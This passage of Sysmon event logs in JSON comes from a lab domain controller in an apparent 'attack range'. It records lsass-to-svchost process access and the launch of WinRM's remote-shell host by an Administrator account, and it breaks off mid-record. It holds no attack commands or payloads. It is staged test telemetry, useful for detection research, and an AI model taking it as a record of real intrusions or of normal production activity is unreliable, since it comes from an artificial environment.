{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4928,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.271\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.271","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4929,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.271\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.271","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4930,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.271\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.271","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4931,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.396\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.396","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4932,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.412\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.412","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4933,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.412\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.412","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4934,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.413\r\nProcessGuid: {E2A3D6B1-11C4-5F25-0000-0010C3D80600}\r\nProcessId: 2464\r\nImage: C:\\Windows\\System32\\winrshost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for WinRM's Remote Shell plugin\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: winrshost.exe\r\nCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11C4-5F25-0000-002093D80600}\r\nLogonId: 0x6D893\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96\r\nParentProcessGuid: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nParentProcessId: 596\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.413","ProcessGuid":"{E2A3D6B1-11C4-5F25-0000-0010C3D80600}","Image":"C:\\Windows\\System32\\winrshost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for WinRM's Remote Shell plugin","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"winrshost.exe","CommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11C4-5F25-0000-002093D80600}","LogonId":"0x6d893","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96","ParentProcessGuid":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","ParentProcessId":"596","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4935,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.412\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C4-5F25-0000-0010C3D80600}\r\nTargetProcessId: 2464\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 